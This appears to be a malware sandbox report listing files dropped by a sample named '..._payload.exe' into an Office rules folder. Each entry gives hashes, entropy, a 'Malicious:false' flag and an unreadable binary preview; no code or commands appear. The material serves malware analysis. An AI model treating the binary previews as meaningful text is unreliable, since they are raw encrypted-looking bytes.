                                                                                                      Preview:.<?.;s.....e......p}v...K.xvX...b.,..7p..b...r\><8.}.L:,.c....J9.n..t.>....U..4s7....b'..r.t-.....^rh..R}.g.:..G...:...+y..c....wnoj=c....E..}O..iX...!...)^.E..2.[.`]Q....2;Ms.E?*..X...7q/j..Z.0.[.PI.X..CH.A..m.-....$..l...o.5..6...,+..J:..:F.y.#.$.\b......h.."..?....E.04.0.J....(......].$3~|.;."....4....A.M.z......./.FR...D....3l.r....%.&H.kZ.:;U.....k.z&.jjL...+k.A.<.3...B..a..u.m.x...@..7.3.....9)w....N.4,.V...72.u*.H?.").....DU.du.......j.EyT..~.3.&\X.....r.....k..KM.`V...6.'A..1....]-@.e..sa~.4.sM`[.@i..MQ..|... ..M!Y..&Xbi~.a3.I&..C.Hd..x.ic..&..O..4&({.I.n.t.Z3/+.Ug.&.Z-..A...\.5...Y....*..v.B.b.*...).....:..... ...U...lb...v......z3..g..U.i....H.... BH...cD.$...-..?Jg.H.#.G..g.yR@?.C.q...;w.<..fQ...lh(./.\.. .=...n..5P...B.Sf.5&^q,.e....._...d6..G..EM...kO..6.sA........\6.X..zH..i.xG...ET.J.OXF0.7.@......N./|uJ...o...-...v..a..+^...`...r.6Urt..6.9..p82t:lJrO..#...9....Y..77..?.8..d.=%u</.....o.mS....q4...U.(r.4..|........$.........$

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703551v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1743
                                                                                                      Entropy (8bit):7.868152646048805
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:Sy1ZbIFPgQy1p2Ynvt+KR5WIwbd3fzXwD:SRdX9YF+Kl6Lc
                                                                                                      MD5:7DC0F4C7127E6BF7B3945FA60671E389
                                                                                                      SHA1:83541250D12424F96369AC0FBD01AAB0B7277D70
                                                                                                      SHA-256:0F6A4935840924265258CB4C75EFA2E197758C7B43EB5EB6C569110DC2677186
                                                                                                      SHA-512:C1E1F78EAFFC3928F8E42A06E867BD5DC2C2E2F7ED0031347A2CFEFD7A7C81DE44D32A181BBEAB9334E2EFC0ADFA92385C71EC3F94EC423A5C8EE271D5BAF70E
                                                                                                      Malicious:false
                                                                                                      Preview:.<?...x...}[..f{.8./.l&..f.@;.o.t}j..=)@.......n..*..8@'0WxX,t..s......./:W....}...r....{.Q..EfD...-v...b.(.iy..rk..?..<5v..N,......JfF.w..pY..{.....l...?5.^.....|.r..4.{e3....)...Mv...4.S.9.d..G.9.:.`..}[)0.c.:.-w@lD...^....V..X1.u)J.5.NF.H.o.@..Yz,.;yKL...e.6..akcc.].d.|.^r7W......r..i....%.\...{..l.:......*})Ysk...8...d.l2...>.,.|.c........\S.u5.Rp.A.._.%..^...v59...@/P...Yi.\....U(.|z.>..1.L:.....a....n.+YLr\.^y.....R.?..C...P/....vaT ..=I .......?.].@y8....... EA...0.5.Pq...l].?%......|.3.....V.7.....i..c....\.lP4d..!.0e......b......O<..{Z....=..c....H...|..=.../.|i....4.........+.HN1x.pE.l.......R..xp..a...7......t.y.! O'.M.L3..L.Q....OT.ne...5.S.^..... .p. ...`.+)-.G....-]....o..P....s.Z.Ce.N.( ..3.."...y.h.~......C.. ..u.C}.o.0p....jt...Xl}E.L..1Yl..6....../.nq....t..g..2.....I.6.D>.h`.*.T..t.fr..?...m...Y..G...d.T.>.$........."...z|..A.a.0M.7.2..17.go.X.0p..FU.."n...3..c.:[=./.%...O9.>o.Y.^`eM.|N...-Tb.T.E3...M..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703600v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1692
                                                                                                      Entropy (8bit):7.8835970128323245
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:3Jd/caoFi9G5O7t9bxkRfBLfgsw+vHnwD:3MrJ2oRYsPHs
                                                                                                      MD5:DB7324CA6C1E1D9F40178FA6C055E3A7
                                                                                                      SHA1:BCB3816801FA78F26E8F79A2069D915B8A7DD8B2
                                                                                                      SHA-256:1FE1DF4F9B2A7D4EEFE8A145340DAE76E0B8EF1B4F63DE755B50B5D2694C487D
                                                                                                      SHA-512:21BF08E30490CFB0B1C15A139EBAF7C3F776352605A859CAA1C5A17F51D43B86E5DE7A0CE5FC9BF9B0100268B8BF0B736126F3687449A1A3256A52685BFA01C2
                                                                                                      Malicious:false
                                                                                                      Preview:.<?D.u...-..]*..N..aY....:'}.F..."....L.n6(z..s...`......u.......;......*..*.\.-*.....J....fi.?...YA(D...@2.f.a..9.`...8..Q......S.KI+..}..7.'#......;..'.k......jM..w.......}..........h...c.|.].MN.?.$.~.4.....JX......0.S.....Y..).../%..=....X.|i..Z...&.W..2FC...s.g.e)P...w6Mf.7.x=..P.6l..%.....5..;y,.gB..M.9..~..L.'.u;.yF..!tm\.3.....x.J..8v5S...V.aW.....F.r..".h,..O..$...T...c9......l.opH..rf.U.H.#I.[.*R...f...mWF.y..4w..4{...g...._9.6.C.wU...M..xi......?.}.kHSut.)./.....W...(.!5.....;.w....E.).w.p...Y.....cN...3.e.q.{Q...ySf.EG.... @E$...!.-.W.ee..z...m...1G....:%......ihNKt.........H....<..Y.3..x.....g..>....q..&....m.l..n....?.~..k.U...\....Y...yXE.>.nBP.x...HJ..*....|.D..w.Nx1.....k4Z...C...".gm....`. .=....5..).<..q.........~v.*...m.w..rc....n....... ....U..w8.R.*....ah....A}..l...j{.[.../.......wr......q.......%..D. ..T.+..$..F+%.Y..gAs...V.$Q1.|...g...%^...O\[.g.ol.8.....2...6b.....s'u..tK.f.I..].R/...QQ...O. .y.....k.;;.7q..%.a0.........

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703601v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1729
                                                                                                      Entropy (8bit):7.8955214379720795
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:1kvtp1IgGLPRdAQ1DvWzawNhpBeC0oG80iYpwD:yr11GLPRdAMSLe3on0da
                                                                                                      MD5:DE23BEE04340B6D23F67EFFC4470B3B9
                                                                                                      SHA1:42B4A9EF731743A9DA722313D8E0B5225DE673E7
                                                                                                      SHA-256:00889D86AB19E01BFB8E8908D58EA0B3B55A3184966A474B266B5E48B7C1A464
                                                                                                      SHA-512:BF08C3B7D81AAEB7FBB0ADB62F664B57FC936A88755D0E09EC894DD9A5B74732363A302342F95ACB75E6B0EA4D04A96D61BE3E2DDDE7339583B6027E12A3B658
                                                                                                      Malicious:false
                                                                                                      Preview:.<?D.J.-Jg}..,.g/....+)..9rm.S.(a......5..*+.h.....]..N.9..I......'i..w..7..W....d.Jb.f}I^.G..o..}B.J......#.d[$}RjV..s+......A......T..-.?.E.2.x..*Vq.A......B,.]........f.bCy8.v.....r...,..uG....j..<.HU....y!.K.......A..P...ezN.w*.;..&....{.[G.._6d?.CB~.<.uap...\G'.....".`Q.Tt.<.....6P.L...A2..;N4Efj./.kG.i?`|......f....yHp.g<&hw.4.5..!........@.n...X..aG.L......d|o.S.....$...f_....=..`y..?...gG.qE.Y...x2.5....:..u._7Ap..*I...z&n.l....5O._.Nl.....Ir.!mM...J..)p2o. g.....D8........X..i.G...i6."..`|..n..;.;.u...3..7...sM...<..E$....d>!..b...:n...5H........1.."...vI..x.)_.p.<..9.yEj.o.....-...I.~RWn.tJ)+9....h. T.......JT....G..R..|.'..i~..'..Pl..B..T...#....L...".T..G...\#..d...L.@.e.+".....O......f..GF.U..I0t..R@x....N?l...>.!..\y.".J.F.....2.".`.*E..n.........M.f...v.9.=.....%..2.i9...r.*.."v...2..lMf..C...>..v.`....yv.6j.Aa.]..)T.........8hk.X.........e...VG.\...21.?.....Q5.Q.Q..._J......(F.t..(R.....*UlVU..H.t...<.....sG..). .?.....>{....X

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703650v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1694
                                                                                                      Entropy (8bit):7.897839231042203
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:YLjZfFU05dB87csv0S4hmUWkB6C8tjh6pVxaboL4bwIQjKecdF7Y0URR8UvAShbs:Yv1FU05rWn81htBgNWV4sjKYxzTVwD
                                                                                                      MD5:9B2EEA6D0752C90496DD8C5C8C7EA8F7
                                                                                                      SHA1:173BC22E9F7165BCC99D8921E08037EEB0C159A3
                                                                                                      SHA-256:2D35CDF038A073ADC69B3EC42A459DE71D140420D7D8B6E14757D4462718C257
                                                                                                      SHA-512:0473E11509F86A13AD5ADD661295C7D0D3B6EB5C33C42669C24FBE4B8D6D88D90A29AE61B3EDE2756428C1BA33B5A752BDBEB8F55CF2014E089DA9169A3DD2DD
                                                                                                      Malicious:false
                                                                                                      Preview:.<?"...~...u.T..Wnl..x.u].......8m..0.|...Y.*.V..../.[0..,'.V.fG.S\.Nl|.gg .1{..|...r.......|.m..h.y4S.$6.....BI.@..@.9.1..a.?.f.`V..~..R..0b;.P.Fji..'."\.N5\.x._.t..g.....P.\..?N.R....hR.........../.....Q.....ai.,...........+q.j...M<(@....f.w.c......L6..}y8......sd-..g1...n.G..<$0p.Av...@B....=.T.LT.../..f....(oK).Q....L.......4.".Q.LBi.J.-.Q..Q.X$..@...:q,I..w.A..n.r.k...4.q.r..#........S\.4j..g..(U...JO.J..W....... .$&........RMr.x.,. ........%. ........i.....Yb>i...l.<......t...Q/.&.n_2...N.I9\i.d.|..V..H^.`../.2Yw.Q..!.....C..0.i..;Ef...@ .A..A......;...85QZ@...BG84b....(mc......~....QqJG...-..j..A?...M..f........;...qRE..*r...q.#X...Wz8.1.."&...R...d....3..=C8dX...G......(....ih.S...14..}}V._........a.;:O.3be>.E.;..l..+#.r.N...$|.|..>..k..p..U.9..;uh....).M..8..~.........{..C.!.....8*N.f^..$.s......J...7..>.S..Z6g.j........@....RQS.]a.S.Q%.t.v.4..V`.........^q....~9..4.(...T?.`.....3..._..x...VS1..=!......0..).......(.1..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703651v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1731
                                                                                                      Entropy (8bit):7.897771544749565
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:kMo9z5MfCclXl4l50/ZiNMmd1qZXUp0AQ5SsuwD:Zo55MfHlXl4l5KZTo1qZWQo6
                                                                                                      MD5:0D5E42629D93C4A0D248CBF75697A57D
                                                                                                      SHA1:55B04CE248812DE2441312D3CB751090814C9F36
                                                                                                      SHA-256:35300BCE0C048C6350C15D578DCF691A0E1B017E1B13C80FED4473DAACC7FBD6
                                                                                                      SHA-512:DCD56F268A2CCDF0102183453B59FFBE128CE496DF8BD5E4E3D6698CBBF7236B635517046B58051510EA01DEE203F2D4BE6B88C407E0967EC7D733415D15E21A
                                                                                                      Malicious:false
                                                                                                      Preview:.<?......[...K.....;.#....#J*..f...fq..k..|.B&...i.d..I...v..r..\%...n..P.lVQ...e. vJ*p.v."(.v...E.lx...V..l.r.... .vH:.w.+z.6.......6.J..`\.Q.(..C....7.0Q@.....^..~.M.%.1.{............s<j..{...~,..6.......t..>h..7..v.Y..*?..D..lN.......a......*..6................/..i.5.P......7.@Y.. p.....x|.f.G..?..T...u.'..g.....Y/.#..r...4T....*...f...C..<8v4..cI...\...*...O..?.....c.gDw.Z;.....Z..<..j.....v4_.L..Bt......%F.*.%F.(f....s.!+m.......@9C...`h..=..7p............"..E....mOa..L..$.Q......=.Xbg.....K..g.o*$Gu.U..|..>:...g..Mh.W. .(=..t.3F5........y...0.C..<<ht.....L*..R.[1..%.E.....]W.&.h....*^;...(N.MDx....-;.m+...1.>.1.....[.....\MN.dgB..m... .Z..^....2I..|_c.I)mY.'.u......{q!..U...&K.sBm..."4.oJD-E..q....g.N.X..8....TH$N.[R....&.m|.o~..,. .hR'.....]B.0}...j.R^.8...o%...Y5......z.z../......5..N..GJ-..\r0g3...#..zM.1...e.[...n7.E...z..,.C.R.....X..)\....o.E.,.b.i.......G...*X.=..e.k..dZ.pQ..,.<.m.{.9Q9..r..Cy..d...f.{.$@.&().....j...S

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703700v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1712
                                                                                                      Entropy (8bit):7.897876727438315
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:n7fYajDzMIiPun11BwRCG5eP7zV3foeEwLPwD:nB3uun1bRGuVI3
                                                                                                      MD5:06B358BB2DB5E3F003827AAC058BA06E
                                                                                                      SHA1:22D4BB4E16BA80DE08CD1876FB55431D28C27BBB
                                                                                                      SHA-256:D0BEBC6A0679877FE500EEF2E8A09C45B98B05558A7F1045005FA7DAE983B7B5
                                                                                                      SHA-512:0A7972EDABE36EBEB395B0A1C8D4036516FB60AF2B05F0D64736C6C7995A71487516BA25CA8BB22004CE76C1FA313D0E38DE090D7363CBD8DC52CB9B8400C3A4
                                                                                                      Malicious:false
                                                                                                      Preview:.<?~......zl.,..f.p}.p3M.T./..... "........W.3...."..6h.~c..7....Egi..T.#.x.w....o, ?...`...cE.`zp...\c..,>.7..~|....^......s\...H.paN...^........H..+.}y.&%./..^.CN.*.c.d!...B....&..7..<>Z%............<`riY^...a.../.'.c/J.L.....pt.....v{....%VG)q.-f....Jy$../..f.&.s.....j.|7P.."I...\..]h.\..D..^..^.>....Z...`9!.LMi................o..\i.47g....f..r.]<MfL$..&E4.A..l..9X.%-..\*QqM.......%U.A..s'..{....Xua...<V&*3....X.........`.|..y..s...74..../...s.....2"$".4......wE._G.*i....O....0GQ$wb.&.../...u..n...n..1E.i...)J....`..AO".O..8.m$=.(z...Y|.<..'_.......g,.. .....>~..]>....)w."v.{-F.=.T...@%:.v...As'.}b..Y.a.[....xTF...v...H...#...d)=T|....@.9.g$_....G.........i..b..l.".X....K..z.B...bw.i.TL...Wo.4.....B@.....c{*..l./.>.H..k.....O.=..=..V.......]."d'5|.|..q...;..I..^.Bn..pi..]...n3...^H[5w-zx..f...3gq....d3`.fb.0....."..Z....9.O.<.r.~a...R7+E..;...z.2<..S.,.....[&...M*..r?...j..o...,u{q.....=...G.;.5.TXV$.~r...Q..#..p..;=i.u...0.....;.....q.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703701v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1749
                                                                                                      Entropy (8bit):7.899757043420745
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:dIaqUKAJTqeVefHa9h9k9yKLhzkD2yaK1i1boFwD:7NKaTzVP9nTKLhIVIF
                                                                                                      MD5:3931FB0F59B00871EB8E5D99468DB817
                                                                                                      SHA1:4147764DF6A5C3AB74EDE519013633A4DAF966E9
                                                                                                      SHA-256:7631DDB74AD56E187E952C457F5847FD984DF6AE308F4E0EBD816D29F0E404BC
                                                                                                      SHA-512:9DE433688E2D707C7CF353E5A41DD3EC8AD349D83C9EEDE299B64BB39BD806AE2FAD20D6296597D34EAC2ABD5F85A11BCF324A1D9C18AAD16EE133C85A658A62
                                                                                                      Malicious:false
                                                                                                      Preview:.<?U.B.+.4..D....*..|...Sn......$oC.........7....Ygsq(.J.$.......Gm.c4Iw.?..d.;.......,.d6.o...8..]..<X..B...s..CZ.}..-:...nYL..ha..q!O.F..m.....L5.l9....8G...YJ(...[i....>m.f..hBih..@YKA.7B.........qlu...........W.:.s.....h.r.....p...................;.=....8-..o...}.p..&...;......\.N.+..))..k0e/V .[o?..6...!...y..c..Y...../ .%....<.g.....HQ..N:/.:..8.R/...!"1..._....&..i"({...k...k...@....NU.Jk&V~ M.T..Q.I.....b..=p6\.-V....q.^F.....d.4..OK ...!.&....a.".B&..O|.)y ...v"..i.z..SS~..G...v).4+e.....J..A..n?}p...8....z.....nB.0....9...........2i!....K..U..0X.|.W..$....Z.P9....L....Q....7 ..zI'.28l?....(.k.0>..u.t...M....'.W6.........h...T.._.....-..@.;....JW....b...._....q..DK.n.^..f}.D.3"R....~..!%.....z.g.......l..........B4*}..r[0'Y.E....R.....P....'n....W.N.....8.Hi......!.B.^.....G.u.y.....@1..E.#.`,*.......c...^2r[FuC~.e..lo...(3.;.X0...N2..~Q.E..........WuJ..P./.T^.>.-..^.......k...F9.\D.-.....I.k...F....,....6...^72.A...2 .[S.X..i.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703750v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1734
                                                                                                      Entropy (8bit):7.887152160362197
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:2J3BR7IqPCD2aw0gRsFOHjMrxkL5i2W24fDzFmAy4/wD:sIqCD+Rssjvq28DhmAnU
                                                                                                      MD5:1B7C51523935A35B32FB5710405CFAAB
                                                                                                      SHA1:2E40B05D4CBCFA5CE84E44712CEFE89F456F2A11
                                                                                                      SHA-256:F436C1E85F89F1C1BF9FB9E9BBC0EBA8AB36D2299408762292B5B437E7F33894
                                                                                                      SHA-512:F163175125C344C95BF2EE40DBF1B07332550027AAB5C43F587BB2CF0242223CB7C67BBFE38B8F4AE553E566FDBFDDE4A717A4E1EC0FC45DCE8D110BC7A20C77
                                                                                                      Malicious:false
                                                                                                      Preview:.<?..L.!...O.b.0=PK..!.u....Tph..u.<.... ..y..C...51........#...q.i!...)...w.dY......u.W.LOh.......}.i...U.m<.{{...a.f..3..:..F.......u......_.7:....'....'....>U."o.i...;..Q....G..]zl...N......F.].)e.c.V..x.W...y.BBf@.q~....50.I..B..2..40.....M.)........../...9Uc ..kk.0._1..9.A.g..... ..0:...w..F./y..w..t ....~]..}.(..$V...A.U...0.(*MP$.._.!..ekD.z...&..1.Q..:\.C..u5.f.k.Q...pUu.oC.%..,9.,..0..O..9...).i}.....30..D......x.k0..2;.....W....M.7.....W...k.m..._..5S..L.P.]..i8.....;........#..v.A..U`...+@.W?../E.8h..A_$.r8^.V;.va........@....Yn....w...[....j...QH...E.....$..O.....>@.0s..F.'...@(...P.?vE.......j.LF@....u....Of..U.:.$..b.a..YP..f.S.E....%..@..b.R......I...'K<..j...Ec]..'.....f.............H..\fa1^+..d.n./....K.g..6o.M.9O..8Kn..P.j..R.......4gF..!W..!.!...).P..3..$.........2O.@@.EPk..SXq..5...T.#..U........S4...D....Z....z....Y.U...l....z..W...bX..;.....@..J... .........a.....e.`X.g.....Tth.w.V....9m.$.K.Piw<..*|..].

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703751v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1771
                                                                                                      Entropy (8bit):7.8870951649106456
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:x/MuwEFJvDNJHRLCPJKKxDi8/xUbqBU6BES2JRaKETcgGplwD:qjEjbRexKqig6bqagUDEw/pG
                                                                                                      MD5:53E7F1806950F7C56BDE38973B6F0929
                                                                                                      SHA1:C84B351402AE389418F6319B28B0967E73B5D9D5
                                                                                                      SHA-256:6A4A53D47A8BB07DE0F3993B9218884A7D2F433ECFC0E4B522E0AFF4E7B52F3C
                                                                                                      SHA-512:78C536E4CBBF7389C4AE55C130653D8F698450992A65D6D3CA27E7A04EE8C468930385599B63BF9397B5341612905C76FCE2A47B5995CEEEA7D1094D9591A8BD
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.L....n.V.A.i.C.={.G..ev......(.$0.........cX...!n.qd.-.9`..;?.V.?eS.R.......$..Y. A..._r..G5.o~^..+F..X'Wf,..$k.......?....Z...{....(..1..1l...1........kb.....9Ip.".(..E.:..w.=.Q...F...[.B...}`...H..r.~n...>..kq....-...M...2.`.K....G....u....8.g^.&`Q..K.....5(.p......P.p,...s........2Y..9N...#.|..6G.r.,..\DiN.D.=n.&..O..N.1.]Sw.nQ..).....W...-..u..x..!E.~/.}..}...%.......,..v_...9P...Un.B...2..MStq.....U.....t.n...j.,.=.pV.....Q....B..m..W..J..]....u{..l...0.l.W..~..Y..h....,.....yC:..z..a......M...A..x=..a............C....__..G...........<U...zc..A..;.{x..I.e..H......qTy.U.h/z=.D.J...S.f.y.!.~.rh.:.U0.[h.....).#..1.#.4..b...4T..o0.3*....d...*..^..a.....J...zk...hJ..-..m..9}wo.gg@>q..'.B..Q$G.N...0...'.8...6.....0...M...Y*.C(..,.zw.....r.q...C...J..40.Aa..d...I.....!.3...C.S..bV./.hOs...`......cp...iw..TZ>.y...%l!...7.L..4...&...V.?...,.ZS.3.i.IJePCH..S3;.~.pP.t.tE.....M.v .O...@..a3..U.......$..3..X...(.?.$..#..voTg

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703800v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1716
                                                                                                      Entropy (8bit):7.872446564747809
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:WeT7Daz5MSzYQAlYvvCVQM4/7koGHk3yQb00OCA0uH1ylGQ414Lg7A7Wv6bD:Wm7GzZhHo/4/goceyN0do0b87dwD
                                                                                                      MD5:4940B06B9C3423CB96AC382584A76E65
                                                                                                      SHA1:E30E2DFCD4C56E2C4CEC52F3AEF7C15DECBAB2C8
                                                                                                      SHA-256:D1DFBF80B54FD1F5B14903391F24BEF26C4675D2EE0B2AA0FAA45D9CE387958E
                                                                                                      SHA-512:A38E93F91F3D7FEA22AF2D750B6E2CF113B0A9C006A4DF41125F57CDCC9471381C0CCE488CB8431F05F1F28BD76C1139B7F4419A552C5848AA40729C25FE9365
                                                                                                      Malicious:false
                                                                                                      Preview:.<?'6....b....e...V.k.....l.....G(....$`Hy.z.|Q...M.R........x.....s..^..L.u...n.{(t..GX..T.b..b....;..Q.g%...l.!.;>.....<$.&}.,...P..Ur.MT& `..Sq.f.r|2`N......6F.......b..t..j....9.M..2..J`...%.D.....9f7.....D..S"F#.....tz.r...c..^.....N1%.Q..!.f..B}C'.+..~......Z9..k....MV.[.m.+w...>y..Q.J..)B.[.(\..G...d........>.... ..."3y..O3;......7.2.Ba...=>]v..pj.x./n.........t[.7K......H..7..W%.x3~e.1..$...v..zj.Z....._.O`gD*b........Z:.+ix..M.W/....Z.?...........Z&.r;0.N..M.U..A.n......d>3.`.{.m.Om-(..y.*nI;5.M..zt......<...K..Pr........z..l...}..*r.VS..Y...tG..F..}...$.v....`...g....72$..\...U"1.R....*.Sz...w..D.....<h......D..A..Ip...=..%.K..Hi%.h......].tk[......j...g#.0....P..!.&.pfXi&J(.X.s...}.e....j...d.%.Dl?.uj......z..!.%.......ji.r....7?......^.lP%.b...e..S.Z.?.Z..7(.Y7pl....N~.e..|~...$.~...h5.(.OV..nnT...#.X...+a.._.2...s........J.N.i}}..wU......!F....>...RA[.."....f....,...q...<*._.).P.^..}.!._.9...q.5y.@K...&....&...!.w.+.H!...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703801v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1753
                                                                                                      Entropy (8bit):7.903808745292818
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:cIBTVmiMSR93ahQ8r9WRziRs76E8Lx0osLRiR3nN2QbskPGS046urv6bD:crSfqm8r5FN5ucXN2ORe46urwD
                                                                                                      MD5:ADA7459A8EDEE5B426CEBC549311D096
                                                                                                      SHA1:DCE94BA437D7D3A40D3380C5851CF625D10B59AA
                                                                                                      SHA-256:B2248571EF3D1D4ED19F3A50EB3E72E8C9F05479670890456D86C23F6F85B0AD
                                                                                                      SHA-512:B69CED72B15F993A07C34A30847AA71568832EC79A6986B2987BE7853A3246978432A5E6F069F1B7053868C3ADF106653AFEA6B4B629ABE3873EC5D98360B974
                                                                                                      Malicious:false
                                                                                                      Preview:.<?@FI....w...).A.(V.....#H;.9E.Z....^v.W....+......>.&.A?.$.q.$i..C..A2-.........\$=..{..... @..N.<Y.KY..d*lL...z.AN.f.[.....%.P.Z.W.w}J.ti.}/.1.r.F...`=pp.;W.?.!4.....j....7.@.h..fu.F.m...h.......;..y:......5..@j...:...:.f.C.LxK........2..hY.@...Z@.....}+.;"....^yP.c.P.*v.....y..c#......i,K.~..BFRC)..l.......p.H..4g....#...<....n.A.U..$".(.!.[1.qVRr9....W.PHe...nvB[..q.eV..]. \....nN*.u4'..y.l..Z."l&.....#!...Y....0.......d..dw..ba.E...r..j..=..R..s.....[>!%.{.......*o...h....[M>3M.\.o..".<.;@...=...:Z...+............5.T-...n.....p%.F.w.).....Gjgq.+.....P...-....3:^.....j.Il.:.\,L..3.4p.2USA...a.Um.34lS.'....u.L...f..;......y...gX:[.........V./.V.w........h..Z...{.N.I.(.....Q..o.r.%.m.Lu...gaa.. ..............xj;.Of.$.........l..rD...t.T^)K.W2K.w......,CL.5GN.x0....5.....z};g._..&v....U......../I.#AA..w.?..Y...l...OB.A.....|q4P..[}......c.....;8/.%.......,......'zcL].UB..bf....j.D<Bc...........r.b...f-s=f.N..J).f.n.z*g^.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703850v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1739
                                                                                                      Entropy (8bit):7.883434247456555
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:rkTtbS1e5SAbRZJbPz69kGLeCYBuAKd4bfwD:AhbmVAbRZNPz69Ecv
                                                                                                      MD5:80CA1B1F1CE0EDE32D92E3DEB3889BBC
                                                                                                      SHA1:FB99FB1D69240C4465D64CA4B75BD26E660DD793
                                                                                                      SHA-256:62162214162961AF9CB9895F7647B4536C9AF34F2E0470F5C3A76DC7BD110549
                                                                                                      SHA-512:07F6B098087BC3237A41D2CF14E3686A09DADE7908785223476C0932FC3E8B95D87976FF33EEF5BB22A7EA6F91197C5899C5D056388C8A207A7BBE4819848C16
                                                                                                      Malicious:false
                                                                                                      Preview:.<?4....g"Fc..V..IZ*......y..Td...B.p..:.W2N...#.M.w.m.....F..H.5.u.JcD.t.^..K..DD....B.<V..Z\DH4)./...I..v....-n..k..WZ......X..F]?.. .......................s%.6\.8.........|.0q......q.P...{.8....I.......m..r...K..?....j...}+ .G...:.{..5.dv.E.N.5H..]..8.......6..B.P.R.R.....O.,h.n...Z.......T...#/>[w...x..v.._.d._...G..=..cI...TN.?.......WO...Si........^;.........K.x.bF..N./.2S..".U.HI..~e5..:W.0.._Jp-4..U..................P......9.g).+..T..ry.K.S..%......J..Q.....K.B...R..Y..S.@....|A.)L.6..6..........T'B........f.4|.i.......X..5L.....v6......cC.o.......x..F.......[S......RR...R..........3....}>*.u..[.[..!.F.j....G.X...o|..r..."......0....5M.u].o.*.m.af....v...w.......!.M..q..-..A...33N>.........O.{.0wH...Y..8.]...}.J?...d..w..~a.U..R.zc.M....1..W.a@n..0..y.4K.......4..V#.../=.%.....-c^...f.q].>.(...~....- C..N.M..OR..o.../.<...J.wF..............k.d^..\d|4.J/~.....<d....0........muG.7^.~<.>.A.%......;.......H6.....+H$:.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703851v0.xml

                                                                                                      Download File
